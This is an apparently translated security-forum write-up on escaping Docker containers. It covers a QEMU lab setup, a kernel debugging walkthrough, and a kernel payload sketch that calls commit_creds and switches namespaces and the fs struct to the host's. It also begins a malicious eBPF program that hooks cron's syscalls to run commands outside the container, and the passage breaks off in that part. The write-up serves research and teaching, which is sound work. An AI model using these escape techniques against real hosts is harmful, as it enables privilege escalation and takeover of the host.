Transcoded by SimpRead; original article: bbs.pediy.com
[Original] Kernel, container, and eBPF attack and defense
Table of contents
- Kernel, container, and eBPF attack and defense: preliminary exploration
- Environment build
- Viewing an in-container process from the kernel's point of view
- From kernel vulnerability to container escape
- From kernel feature to container escape
- libbpf
- libbpf-bootstrap
- Basic structure of the eBPF user-mode program
- Completing the escape by hijacking high-privilege processes through evil eBPF
- Basic introduction and flow of cron
- Hook program analysis
- Testing in Docker
- Hijacking the sshd process through eBPF
I have been reading up on containers recently. Before doing so, I hand-rolled a mini-docker; there is a lot of good material online, and I recommend writing one yourself for fun. If you want a quick understanding of containers, you can also read my notes: https://github.com/OrangeGzY/mini-docker
In the end, an environment like the following should be produced:
Most kernel-debugging setups described online use two-machine debugging, which is cumbersome, so it is easiest to do everything with QEMU.

- First, compile the corresponding kernel to get vmlinux and bzImage.
  Note that the following must be enabled when configuring the kernel:
  CONFIG_OVERLAY_FS=y, because Docker needs the corresponding filesystem support. Also turn on
  CONFIG_GDB_SCRIPTS=y and CONFIG_DEBUG_INFO=y if you want to debug the kernel later.
- Then use syzkaller's create-image.sh.
  Modify it to add mounts, including cgroups:
  echo 'debugfs /sys/kernel/debug debugfs defaults 0 0' | sudo tee -a $DIR/etc/fstab
  echo 'securityfs /sys/kernel/security securityfs defaults 0 0' | sudo tee -a $DIR/etc/fstab
  echo 'configfs /sys/kernel/config/ configfs defaults 0 0' | sudo tee -a $DIR/etc/fstab
  echo 'binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc defaults 0 0' | sudo tee -a $DIR/etc/fstab
  echo 'tmpfs /sys/fs/cgroup cgroup defaults 0 0' | sudo tee -a $DIR/etc/fstab
  Then execute:
  ./create-image.sh
  to generate the file system.
- QEMU startup script:
  qemu-system-x86_64 \
    -drive file=./stretch.img,format=raw \
    -m 256 \
    -net nic \
    -net user,host=10.0.2.10,hostfwd=tcp::23505-:22 \
    -enable-kvm \
    -kernel ./bzImage \
    -append "console=ttyS0 root=/dev/sda earlyprintk=serial" \
    -nographic \
    -pidfile vm.pid
- Connection commands after startup:
  ssh-keygen -f "/root/.ssh/known_hosts" -R "[localhost]:23505"
  ssh -i ./stretch.id_rsa -p 23505 root@localhost
- Finally, you can enter the system through ssh:
  root@syzkaller:~#
- Install the corresponding docker-ce, allow root login over ssh, and set the root password:
  apt install docker-ce
  vim /etc/ssh/sshd_config     # PermitRootLogin yes
  passwd root
  poweroff
  If the first step (installing docker-ce) fails, follow the check-config steps below.
- Re-login to confirm:
  Debian GNU/Linux 9 syzkaller ttyS0
  syzkaller login: root
  Password:
  Unable to get valid context for root
  Last login: Fri Dec 3 14:09:17 UTC 2021 from 10.0.2.10 on pts/0
  Linux syzkaller 5.16.0-rc1 #3 SMP PREEMPT Wed Dec 1 09:46:37 PST 2021 x86_64
  The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
  Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
  root@syzkaller:~#
Here is an official script for checking whether a kernel config meets Docker's runtime requirements:
https://github.com/moby/moby/blob/master/contrib/check-config.sh
How to use it:
./check-config.sh /path/to/kernel/.config
If dockerd does not start up, run this script to check the environment, then enable the required CONFIG options and recompile.
If you still cannot run dockerd directly after the above steps, follow the steps below to create the container manually with runc:

# 1. Get rootfs (outside the VM)
docker export $(docker create busybox) -o busybox.tar
# 2. Put the rootfs into the VM's .img
root@ubuntu:~/container# mount -o loop ./stretch.img /mnt/chroot/
root@ubuntu:~/container# cp ./busybox.tar /mnt/chroot/root/
root@ubuntu:~/container# umount /mnt/chroot/
# 3. Finally, boot QEMU and untar busybox.tar in ~ into rootfs/
root@syzkaller:~# cd rootfs/
root@syzkaller:~/rootfs# pwd
/root/rootfs
root@syzkaller:~/rootfs# ls
bin dev etc home proc root sys tmp usr var
# 4. Generate the OCI config
docker-runc spec
root@syzkaller:~# ls
config.json rootfs
# 5. Run manually: docker-runc run
root@syzkaller:~# docker-runc run guoziyi
/ # ls
bin dev etc home proc root sys tmp usr var
/ # id
uid=0(root) gid=0(root)
/ # ps -ef
PID USER TIME COMMAND
    1 root 0:00 sh
    7 root 0:00 ps -ef
/ # exit
# 6. vim config.json
"root": {
    "path": "root",
    "readonly": "false"
}
final effect:
First we start a top process in the container started by runc:
Mem: 261032K used, 1438232K free, 16624K shrd, 6996K buff, 101932K cached
CPU: 0.0% usr 0.3% sys 0.0% nic 99.4% idle 0.0% io 0.0% irq 0.0% sirq
Load average: 0.00 0.00 0.00 2/77 6
PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
6 1 root R 1328 0.0 0 0.2 top
1 0 root S 1336 0.0 0 0.0 sh
As you can see, there are two processes inside the container at this point: PID 1 (sh) and PID 6 (top).
Then we run pstree outside the container
root@syzkaller:~# pstree -pl
systemd(1)-+-agetty(244)
|-agetty(245)
|-cron(193)
|-dbus-daemon(189)---{dbus-daemon}(191)
|-dhclient(225)
|-rsyslogd(194)-+-{in:imklog}(196)
| |-{in:imuxsock}(195)
| `-{rs:main Q:Reg}(197)
|-sshd(247)-+-sshd(319)---bash(328)---docker-runc(497)-+-sh(507)---top(526)
As you can see, process No. 1 inside the container is actually mapped to process No. 507 outside the container, a child of docker-runc; similarly, the top process inside the container is also a child of 507.
In this part, we attach gdb (with gef) from the host machine to the QEMU kernel via target remote, and then observe the corresponding container process.
The gef plugin is recommended here; it feels much faster than pwndbg.
My personal gdb configuration for kernel debugging is here (the paste expires in 1 year):
https://paste.ubuntu.com/p/wMvftKv2bV/
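For reference, a minimal attach flow looks roughly like this. This is a sketch only: it assumes QEMU is additionally started with the -s flag (a gdbstub on tcp::1234, not shown in the startup script above), and lx-ps comes from the kernel's own gdb scripts, which require CONFIG_GDB_SCRIPTS and auto-loading of vmlinux-gdb.py:

# on the host
gdb ./vmlinux
gef➤  target remote :1234          # attach to the QEMU gdbstub
gef➤  lx-ps                        # list task_structs; find the container's sh/top
gef➤  p ((struct task_struct *)0xffff88800c1b8000)->comm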
The first thing to be clear about is that a process in a container is essentially a restricted process on the host, with namespace, resource, and filesystem isolation.
We focus on some structures in task_struct:
/* task_struct member predeclarations (sorted alphabetically): */
struct fs_struct;
struct nsproxy;
struct task_struct {
#ifdef CONFIG_CGROUPS
/* Control Group info protected by css_set_lock: */
struct css_set __rcu *cgroups;
/* cg_list protected by css_set_lock and tsk->alloc_lock: */
struct list_head cg_list;
......
/* Namespaces: */
struct nsproxy *nsproxy;
......
/* Filesystem information: */
struct fs_struct *fs;
......
}
As you can see, a containerized process is still just a process: the kernel maintains the corresponding structures in its task_struct (the PCB). Three of them matter most here: fs, which holds the working directory and root path; nsproxy, which holds the namespaces; and css_set/cgroups, which handles resource limiting.
Let's observe these structures.
struct nsproxy
/*
* A structure to contain pointers to all per-process
* namespaces - fs (mount), uts, network, sysvipc, etc.
*
* The pid namespace is an exception -- it's accessed using
* task_active_pid_ns. The pid namespace here is the
* namespace that children will use.
*
* 'count' is the number of tasks holding a reference.
* The count for each namespace, then, will be the number
* of nsproxies pointing to it, not the number of tasks.
*
* The nsproxy is shared by tasks which share all namespaces.
* As soon as a single namespace is cloned or unshared, the
* nsproxy is copied.
*/
struct nsproxy {
atomic_t count; //refcount
struct uts_namespace *uts_ns;
struct ipc_namespace *ipc_ns;
struct mnt_namespace *mnt_ns;
struct pid_namespace *pid_ns_for_children; // the pid namespace is special: it only takes effect for children created after it is set; the first child forked afterwards becomes init (PID 1) of the new namespace
struct net *net_ns;
struct time_namespace *time_ns;
struct time_namespace *time_ns_for_children;
struct cgroup_namespace *cgroup_ns;
};
struct fs_struct
struct fs_struct {
int users;
spinlock_t lock;
seqcount_spinlock_t seq;
int umask;
int in_exec;
struct path root, pwd;
} __randomize_layout;
struct path {
struct vfsmount *mnt;
struct dentry *dentry;
} __randomize_layout;
struct dentry {
/* RCU lookup touched fields */
unsigned int d_flags; /* protected by d_lock */
seqcount_spinlock_t d_seq; /* per dentry seqlock */
struct hlist_bl_node d_hash; /* lookup hash list */
struct dentry *d_parent; /* parent directory */
struct qstr d_name;
struct inode *d_inode; /* Where the name belongs to - NULL is
* negative */
unsigned char d_iname[DNAME_INLINE_LEN]; /* small names */
/* Ref lookup also touches following */
struct lockref d_lockref; /* per-dentry lock and refcount */
const struct dentry_operations *d_op;
struct super_block *d_sb; /* The root of the dentry tree */
unsigned long d_time; /* used by d_revalidate */
void *d_fsdata; /* fs-specific data */
union {
struct list_head d_lru; /* LRU list */
wait_queue_head_t *d_wait; /* in-lookup ones only */
};
struct list_head d_child; /* child of parent list */
struct list_head d_subdirs; /* our children */
/*
* d_alias and d_rcu can share memory
*/
union {
struct hlist_node d_alias; /* inode alias list */
struct hlist_bl_node d_in_lookup_hash; /* only for in-lookup ones */
struct rcu_head d_rcu;
} d_u;
} __randomize_layout;
....
struct fs_struct
-> struct path root
-> struct dentry *dentry -> struct qstr d_name;
You can see the root directory (fs->root) of process No. 1 in the container:
gef➤ p ((struct task_struct *)0xffff88800c1b8000)->fs->root->dentry->d_name
$12 = {
{
{
hash = 0x2a81534f,
len = 0x6
},
hash_len = 0x62a81534f
},
name = 0xffff8880100a7b38 "rootfs"
}
gef➤
fs:
# container init
gef➤ p *$t->fs
$11 = {
......
umask = 0x12,
in_exec = 0x0,
root = {
mnt = 0xffff888010b86320,
dentry = 0xffff8880120b5700
},
pwd = {
mnt = 0xffff888010b86320,
dentry = 0xffff88801235d900
}
}
# host init
gef➤ p *$init->fs
$12 = {
......
umask = 0x0,
in_exec = 0x0,
root = {
mnt = 0xffff8880076b8da0,
dentry = 0xffff888008119200
},
pwd = {
mnt = 0xffff8880076b8da0,
dentry = 0xffff888008119200
}
}
namespace:
gef➤ p *(struct nsproxy*)$t->nsproxy
$3 = {
count = {
counter = 0x1
},
uts_ns = 0xffff88800c6e91f0,
ipc_ns = 0xffff88801000e800,
mnt_ns = 0xffff88800694e800,
pid_ns_for_children = 0xffff88800cedd0c8,
net_ns = 0xffff88800ec78d40,
time_ns = 0xffffffff853ec0e0 ,
time_ns_for_children = 0xffffffff853ec0e0 ,
cgroup_ns = 0xffffffff853f4680 }
# init process
gef➤ p *(struct nsproxy *)0xffffffff852cd8a0
$4 = {
count = {
counter = 0x4c
},
uts_ns = 0xffffffff8521a720 ,
ipc_ns = 0xffffffff855a62a0 ,
mnt_ns = 0xffff88800694e000,
pid_ns_for_children = 0xffffffff852cbf20 ,
net_ns = 0xffffffff858945c0 ,
time_ns = 0xffffffff853ec0e0 ,
time_ns_for_children = 0xffffffff853ec0e0 ,
cgroup_ns = 0xffffffff853f4680 }
As you can see, from the namespace perspective the namespaces of process No. 1 in the container differ from those of the VM's own init process: uts, ipc, mnt, pid, net and so on are all new.
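The same conclusion can be cross-checked from userspace, without gdb, by comparing the namespace symlinks under /proc (using the host-side PID 507 of the container's sh process from the pstree output above):

root@syzkaller:~# ls -l /proc/1/ns/
root@syzkaller:~# ls -l /proc/507/ns/
# differing inode numbers for mnt/pid/uts/ipc/net indicate different namespaces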
cred:
container process
gef➤ p *$t->cred
$8 = {
usage = {
counter = 0x3
},
uid = {
val = 0x0
},
gid = {
val = 0x0
},
suid = {
val = 0x0
},
sgid = {
val = 0x0
},
euid = {
val = 0x0
},
egid = {
val = 0x0
},
fsuid = {
val = 0x0
},
fsgid = {
val = 0x0
},
securebits = 0x0,
cap_inheritable = {
cap = {0x20000420, 0x0}
},
cap_permitted = {
cap = {0x20000420, 0x0}
},
cap_effective = {
cap = {0x20000420, 0x0}
},
cap_bset = {
cap = {0x20000420, 0x0}
},
cap_ambient = {
cap = {0x0, 0x0}
},
host process:
gef➤ p *$init->cred
$10 = {
usage = {
counter = 0xb
},
uid = {
val = 0x0
},
gid = {
val = 0x0
},
suid = {
val = 0x0
},
sgid = {
val = 0x0
},
euid = {
val = 0x0
},
egid = {
val = 0x0
},
fsuid = {
val = 0x0
},
fsgid = {
val = 0x0
},
securebits = 0x0,
cap_inheritable = {
cap = {0x0, 0x0}
},
cap_permitted = {
cap = {0xffffffff, 0x1ff}
},
cap_effective = {
cap = {0xffffffff, 0x1ff}
},
cap_bset = {
cap = {0xffffffff, 0x1ff}
},
cap_ambient = {
cap = {0x0, 0x0}
},
As you can see, although the uids/gids are all 0, their capability sets differ: the host's init process has the full capability set, while the container's init process has only a handful of capabilities.
root@ubuntu:~/container/module_for_container# capsh --decode=0x20000420
WARNING: libcap needs an update (cap=40 should have a name).
0x0000000020000420=cap_kill,cap_net_bind_service,cap_audit_write
root@ubuntu:~/container/module_for_container# capsh --decode=0xffffffff
WARNING: libcap needs an update (cap=40 should have a name).
0x00000000ffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice, cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap
The principle of using a kernel vulnerability to escape the container is actually very simple: switch the nsproxy and fs of the sh process inside the Docker container to those of a host process (preferably the host init process). To achieve this, the following conditions must be met:
- The task_struct of some host process (preferably the init process) can be obtained, e.g. by traversing the task list.
- The data of that task_struct can be read and written, so that the fs and nsproxy of the current process can be modified (for example, by directly re-pointing the corresponding pointers at the init process's structures, or by calling switch_task_namespaces to switch namespaces).
In actual testing, simply changing the process's task_struct->fs to the corresponding init_fs is already enough for a basic escape.
With this foundation, it is easy to see that we can actually let the container process escape into the namespaces and fs of any other process, as long as the corresponding information is switched.
Going further, we can look into how to do a heap spray targeting init_fs.
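As an illustration only, here is a rough sketch (not a working exploit) of what such a payload could look like when run in kernel context in the container's process. It assumes kernel code execution has already been obtained, and that the addresses of init_fs, init_nsproxy, copy_fs_struct() and switch_task_namespaces() have been resolved (e.g. via kallsyms), since not all of them are exported to modules:

#include <linux/sched.h>
#include <linux/nsproxy.h>
#include <linux/fs_struct.h>
#include <linux/cred.h>

/*
 * Conceptual escape payload (sketch only).
 * It runs in the context of the in-container process after kernel
 * code execution has been obtained; symbol addresses are assumed
 * to be resolved beforehand.
 */
static void escape_to_host(void)
{
    /* 1. become real root with the full capability set */
    commit_creds(prepare_kernel_cred(NULL));

    /* 2. adopt the host init process's namespaces */
    get_nsproxy(&init_nsproxy);                      /* take a reference */
    switch_task_namespaces(current, &init_nsproxy);

    /* 3. point root/pwd back at the host rootfs (old fs_struct is leaked here) */
    current->fs = copy_fs_struct(&init_fs);
}

After this runs, spawning a shell from the process gives a shell whose root directory and namespaces are those of the host.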
The difference between this part and the previous one is that we do not complete the container escape through a kernel vulnerability; instead we abuse some Linux features to complete it maliciously.
Since eBPF itself runs in kernel mode and can place hooks that are almost indistinguishable, a simple idea is to use eBPF to hook user-mode services (high-privilege user-mode processes) that can execute commands, and thereby achieve command execution outside the container. Alternatively, eBPF can directly read sensitive kernel-mode data to cause a leak, assisting escape or information disclosure.
https://github.com/libbpf/libbpf
The libbpf project itself is the user-space loading library for eBPF programs.
First we need the corresponding BTF support:
If your kernel doesn't come with BTF built-in, you'll need to build a custom kernel. You'll need:
- pahole 1.16+ (part of the dwarves package), which performs the DWARF to BTF conversion;
- a kernel built with the CONFIG_DEBUG_INFO_BTF=y option;
check it out:
root@syzkaller:~# ls -la /sys/kernel/btf/vmlinux
-r--r--r--. 1 root root 5883079 Dec 7 07:05 /sys/kernel/btf/vmlinux
https://github.com/libbpf/libbpf-bootstrap
git clone https://github.com/libbpf/libbpf-bootstrap.git
cd libbpf-bootstrap
cd libbpf/src && make
cd ../../examples/c
Next, create the corresponding hello file:
/* cat hello.bpf.c */
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_execve")
int handle_tp(void *ctx)
{
int pid = bpf_get_current_pid_tgid() >> 32;
char fmt[] = "BPF triggered from PID %d.\n";
bpf_trace_printk(fmt, sizeof(fmt), pid);
return 0;
}
char LICENSE[] SEC("license") = "Dual BSD/GPL";
/* cat hello.c */
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <bpf/libbpf.h>
#include "hello.skel.h"
#define DEBUGFS "/sys/kernel/debug/tracing/"
/* logging function used for debugging */
static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
#ifdef DEBUGBPF
return vfprintf(stderr, format, args);
#else
return 0;
#endif
}
/* read trace logs from debug fs */
void read_trace_pipe(void)
{
int trace_fd;
trace_fd = open(DEBUGFS "trace_pipe", O_RDONLY, 0);
if (trace_fd < 0)
return;
while (1) {
static char buf[4096];
ssize_t sz;
sz = read(trace_fd, buf, sizeof(buf) - 1);
if (sz> 0) {
buf[sz] = 0;
puts(buf);
}
}
}
/* set rlimit (required for every app) */
static void bump_memlock_rlimit(void)
{
struct rlimit rlim_new = {
.rlim_cur = RLIM_INFINITY,
.rlim_max = RLIM_INFINITY,
};
if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit!\n");
exit(1);
}
}
int main(int argc, char **argv)
{
struct hello_bpf *skel;
int err;
/* Set up libbpf errors and debug info callback */
libbpf_set_print(libbpf_print_fn);
/* Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything */
bump_memlock_rlimit();
/* Open BPF application */
skel = hello_bpf__open();
if (!skel) {
fprintf(stderr, "Failed to open BPF skeleton\n");
return 1;
}
/* Load & verify BPF programs */
err = hello_bpf__load(skel);
if (err) {
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
goto cleanup;
}
/* Attach tracepoint handler */
err = hello_bpf__attach(skel);
if (err) {
fprintf(stderr, "Failed to attach BPF skeleton\n");
goto cleanup;
}
printf("Hello BPF started, hit Ctrl+C to stop!\n");
read_trace_pipe();
cleanup:
hello_bpf__destroy(skel);
return -err;
}
Update the corresponding Makefile in the current directory:
APPS = minimal bootstrap uprobe kprobe fentry hello
Finally run make
Then run ./hello
output:
root@ubuntu:~/libbpf-bootstrap/examples/c# ./hello
Hello BPF started, hit Ctrl+C to stop!
node-6172 [001] d... 1730.240057: bpf_trace_printk: BPF triggered from PID 6172.
sh-6174 [000] d... 1730.245028: bpf_trace_printk: BPF triggered from PID 6174.
sh-6173 [003] d... 1730.247639: bpf_trace_printk: BPF triggered from PID 6173.
node-6175 [003] d... 1734.181666: bpf_trace_printk: BPF triggered from PID 6175.
sh-6177 [002] d... 1734.184994: bpf_trace_printk: BPF triggered from PID 6177.
sh-6176 [001] d... 1734.187739: bpf_trace_printk: BPF triggered from PID 6176.
Indicates success.
https://facebookmicrosites.github.io/bpf/blog/2020/02/20/bcc-to-libbpf-howto-guide.html
/* cat hello.bpf.c */
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_execve")
int handle_tp(void *ctx)
{
int pid = bpf_get_current_pid_tgid() >> 32;
char fmt[] = "BPF triggered from PID %d.\n";
bpf_trace_printk(fmt, sizeof(fmt), pid);
return 0;
}
char LICENSE[] SEC("license") = "Dual BSD/GPL";
First of all, bpf.h mainly contains a pile of #defines and struct definitions.
bpf_helpers.h mainly contains helper macros and functions.
/*
* Helper macro to place programs, maps, license in
* different sections in elf_bpf file. Section names
* are interpreted by libbpf depending on the context (BPF programs, BPF maps,
* extern variables, etc).
* To allow use of SEC() with externs (eg, for extern .maps declarations),
* make sure __attribute__((unused)) doesn't trigger compilation warning.
*/
#define SEC(name) \
_Pragma("GCC diagnostic push") \
_Pragma("GCC diagnostic ignored \"-Wignored-attributes\"") \
__attribute__((section(name), used)) \
_Pragma("GCC diagnostic pop")
SEC is used to specify the corresponding type, and libbpf will interpret it according to the context and place it on different sections of elf_bpf.
There are mainly three functions in hello.c:
#define DEBUGFS "/sys/kernel/debug/tracing/"
/* logging function used for debugging */
static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
{
#ifdef DEBUGBPF
return vfprintf(stderr, format, args);
#else
return 0;
#endif
}
Here, libbpf_set_print(libbpf_print_fn); registers the debug-output callback for libbpf, which uses vfprintf to print to stderr.
Next, set the corresponding rlimit by:
/* Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything */
bump_memlock_rlimit();
/* set rlimit (required for every app) */
static void bump_memlock_rlimit(void)
{
struct rlimit rlim_new = {
.rlim_cur = RLIM_INFINITY,
.rlim_max = RLIM_INFINITY,
};
if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit!\n");
exit(1);
}
}
You can see that the value is set to the maximum here.
Finally, there is a read_trace_pipe(); to read the log information:
/* read trace logs from debug fs */
void read_trace_pipe(void)
{
int trace_fd;
trace_fd = open(DEBUGFS "trace_pipe", O_RDONLY, 0);
if (trace_fd < 0)
return;
while (1) {
static char buf[4096];
ssize_t sz;
sz = read(trace_fd, buf, sizeof(buf) - 1);
if (sz> 0) {
buf[sz] = 0;
puts(buf);
}
}
}
In addition, there are some other functions.
We notice that in hello.c there is:
#include "hello.skel.h"
This file is generated during compilation by the BPF skeleton generation step.
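In libbpf-bootstrap this is driven by the Makefile; simplified (the real Makefile also passes vmlinux.h/libbpf include paths and extra flags), the two relevant steps are roughly:

clang -g -O2 -target bpf -D__TARGET_ARCH_x86 -c hello.bpf.c -o hello.bpf.o
bpftool gen skeleton hello.bpf.o > hello.skel.h

The generated hello.skel.h then exposes the hello_bpf__open()/__load()/__attach() helpers used below: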
/* Open BPF application */
skel = hello_bpf__open();
if (!skel) {
fprintf(stderr, "Failed to open BPF skeleton\n");
return 1;
}
/* Load & verify BPF programs */
err = hello_bpf__load(skel);
if (err) {
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
goto cleanup;
}
/* Attach tracepoint handler */
err = hello_bpf__attach(skel);
if (err) {
fprintf(stderr, "Failed to attach BPF skeleton\n");
goto cleanup;
}
root@ubuntu:~/libbpf-bootstrap/examples/c# cd .output/ && ls
bootstrap.bpf.o bootstrap.skel.h fentry.bpf.o fentry.skel.h hello.o kprobe.bpf.o kprobe.skel.h libbpf.a minimal.o pkgconfig uprobe.o
bootstrap.o bpf fentry.o hello.bpf.o hello.skel.h kprobe.o libbpf minimal.bpf.o minimal.skel.h uprobe.bpf.o uprobe.skel.h
Under the .output directory.
In November, a classmate of Tencent Blue Army posted an interesting article: https://security.tencent.com/index.php/blog/msg/206
There are many points from that article worth studying further. First, let's complete the evil eBPF program.
My implementation code: https://github.com/OrangeGzY/Eebpf-kit/blob/main/libbpf-bootstrap/examples/c/hello.bpf.c
man cron
NAME
cron - daemon to execute scheduled commands (Vixie Cron)
On Ubuntu, the cron in use is Vixie Cron.
https://www.runoob.com/w3cnote/linux-crontab-tasks.html
root 800 1 0 02:17 ? 00:00:00 /usr/sbin/cron -f
https://github.com/vixie/cron/tree/master
In the source code, we mainly focus on the load_database function in https://github.com/vixie/cron/blob/master/database.c.
#define CRONDIR "/var/spool/cron"
#define SPOOL_DIR "crontabs"
#define SYSCRONTAB "/etc/crontab"
#define TMAX(a,b) (is_greater_than(a,b)?(a):(b))
#define TEQUAL(a,b) (a.tv_sec == b.tv_sec && a.tv_nsec == b.tv_nsec)
/* before we start loading any data, do a stat on SPOOL_DIR
* so that if anything changes as of this moment (ie, before we've
* cached any of the database), we'll see the changes next time.
*/
if (stat(SPOOL_DIR, &statbuf) < OK) {
log_it("CRON", getpid(), "STAT FAILED", SPOOL_DIR);
(void) exit(ERROR_EXIT);
}
/* track system crontab file
*/
if (stat(SYSCRONTAB, &syscron_stat) < OK)
syscron_stat.st_mtim = ts_zero;
/* if spooldir's mtime has not changed, we don't need to fiddle with
* the database.
*
* Note that old_db->mtime is initialized to 0 in main(), and
* so is guaranteed to be different than the stat() mtime the first
* time this function is called.
*/
if (TEQUAL(old_db->mtim, TMAX(statbuf.st_mtim, syscron_stat.st_mtim))) {
Debug(DLOAD, ("[%ld] spool dir mtime unch, no load needed.\n",
(long)getpid()))
return;
}
/* something's different. make a new database, moving unchanged
* elements from the old database, reloading elements that have
* actually changed. Whatever is left in the old database when
* we're done is chaff -- crontabs that disappeared.
*/
new_db.mtim = TMAX(statbuf.st_mtim, syscron_stat.st_mtim);
new_db.head = new_db.tail = NULL;
if (!TEQUAL(syscron_stat.st_mtim, ts_zero))
process_crontab("root", NULL, SYSCRONTAB, &syscron_stat,&new_db, old_db);
As you can see, after four checks it calls process_crontab directly.
The first two checks use stat() to get the last modification times of the SPOOL_DIR and SYSCRONTAB files and store them in the corresponding struct stat.
struct stat
{
    dev_t     st_dev;     /* ID of device containing file */
    ino_t     st_ino;     /* inode number */
    mode_t    st_mode;    /* protection (file type and mode) */
    nlink_t   st_nlink;   /* number of hard links */
    uid_t     st_uid;     /* user ID of owner */
    gid_t     st_gid;     /* group ID of owner */
    dev_t     st_rdev;    /* device ID (if special file) */
    off_t     st_size;    /* total size, in bytes */
    blksize_t st_blksize; /* blocksize for file system I/O */
    blkcnt_t  st_blocks;  /* number of 512B blocks allocated */
    time_t    st_atime;   /* time of last access */
    time_t    st_mtime;   /* time of last modification */
    time_t    st_ctime;   /* time of last status change */
};
The third check tests whether old_db->mtim differs from TMAX(statbuf.st_mtim, syscron_stat.st_mtim), i.e. whether anything has been updated; TMAX(...) here is the later (most recent) modification time of the two files. The latest time is then recorded in new_db.
Finally, as long as the crontab's last modification time is not ts_zero, we enter: process_crontab("root", NULL, SYSCRONTAB, &syscron_stat, &new_db, old_db);
const struct timespec ts_zero = {.tv_sec = 0L, .tv_nsec = 0L};
In process_crontab:
// tabname = "/etc/crontab"
if ((crontab_fd = open(tabname, O_RDONLY|O_NONBLOCK|O_NOFOLLOW, 0)) < OK) {
/* crontab not accessible?
*/
log_it(fname, getpid(), "CAN'T OPEN", tabname);
goto next_crontab;
}
if (fstat(crontab_fd, statbuf) < OK) {
log_it(fname, getpid(), "FSTAT FAILED", tabname);
goto next_crontab;
}
/* if crontab has not changed since we last read it
* in, then we can just use our existing entry.
*/
if (TEQUAL(u->mtim, statbuf->st_mtim)) {
Debug(DLOAD, (" [no change, using old data]"))
unlink_user(old_db, u);
link_user(new_db, u);
goto next_crontab;
}
As you can see, fstat is used first, and then it checks whether the crontab has been updated; if it has changed, load_user is finally called.
You can take a look at the structure corresponding to user:
typedef struct _user {
struct _user *next, *prev; /* links */
char *name;
struct timespec mtim; /* last modtime of crontab */
entry *crontab; /* this person's crontab */
} user;
typedef struct _entry {
struct _entry *next;
struct passwd *pwd;
char **envp;
char *cmd;
bitstr_t bit_decl(minute, MINUTE_COUNT);
bitstr_t bit_decl(hour, HOUR_COUNT);
bitstr_t bit_decl(dom, DOM_COUNT);
bitstr_t bit_decl(month, MONTH_COUNT);
bitstr_t bit_decl(dow, DOW_COUNT);
int flags;
#define MIN_STAR 0x01
#define HR_STAR 0x02
#define DOM_STAR 0x04
#define DOW_STAR 0x08
#define WHEN_REBOOT 0x10
#define DONT_LOG 0x20
} entry;
You can see the cmd field, which holds the commands of the corresponding user's crontab.
Eventually our job is queued and run by job_runqueue() calling do_command(j->e, j->u).
typedef struct _job {
struct _job *next;
entry *e;
user *u;
} job;
int
job_runqueue(void) {
job *j, *jn;
int run = 0;
for (j = jhead; j; j = jn) {
do_command(j->e, j->u); // run
jn = j->next;
free(j);
run++;
}
jhead = jtail = NULL;
return (run);
}
We first hook system-call entry via the sys_enter raw tracepoint: get the current syscall id, read the current task's comm (and check whether it is cron), and then dispatch to different handler functions depending on which syscall we caught.
Symmetrically, we also hook sys_exit, i.e. the point where each syscall returns; this is mainly where the data handed back to user space gets modified.
// When we enter syscall
SEC("raw_tracepoint/sys_enter")
int raw_tp_sys_enter(struct bpf_raw_tracepoint_args *ctx)
{
unsigned long syscall_id = ctx->args[1];
char comm[TASK_COMM_LEN];
bpf_get_current_comm(&comm, sizeof(comm));
// executable is not cron, return
if (memcmp(comm, TARGET_NAME, sizeof(TARGET_NAME))){
return 0;
}
//bpf_printk("cron trigger!\n");
switch(syscall_id)
{
case 0:
handle_enter_read(ctx);
break;
case 3: // close
handle_enter_close(ctx);
break;
case 4:
handle_enter_stat(ctx);
break;
case 5:
handle_enter_fstat(ctx);
break;
case 257:
handle_enter_openat(ctx);
break;
default:
//bpf_printk("None of targets , break");
return 0;
}
return 0;
}
// When we exit syscall
SEC("raw_tracepoint/sys_exit")
int raw_tp_sys_exit(struct bpf_raw_tracepoint_args *ctx)
{
unsigned int id=0;
struct pt_regs *regs;
if (cron_pid == 0)
return 0;
int pid = bpf_get_current_pid_tgid() & 0xffffffff;
if (pid != cron_pid)
return 0;
//bpf_printk("Hit pid: %d\n",pid);
regs = (struct pt_regs *)(ctx->args[0]);
// Read syscall_id from orig_ax
id = BPF_CORE_READ(regs,orig_ax);
switch(id)
{
case 0:
handle_exit_read(ctx);
break;
case 4:
handle_exit_stat();
break;
case 5:
handle_exit_fstat();
break;
case 257:
handle_exit_openat(ctx);
break;
default:
return 0;
}
return 0;
}
handle_enter_stat(ctx)
Entering stat.
First, read the filename from rdi into a buffer and make sure it is /etc/crontab or crontabs.
Next, record the current pid and the file name in global variables.
Then, crucially, obtain the address of the corresponding statbuf structure (struct stat) from rsi and store it in a global variable as well.
/*
https://lore.kernel.org/bpf/[email protected]/
https://github.com/time-river/Linux-eBPF-Learning/tree/main/4-CO-RE
https://vvl.me/2021/02/eBPF-2-example-openat2/
*/
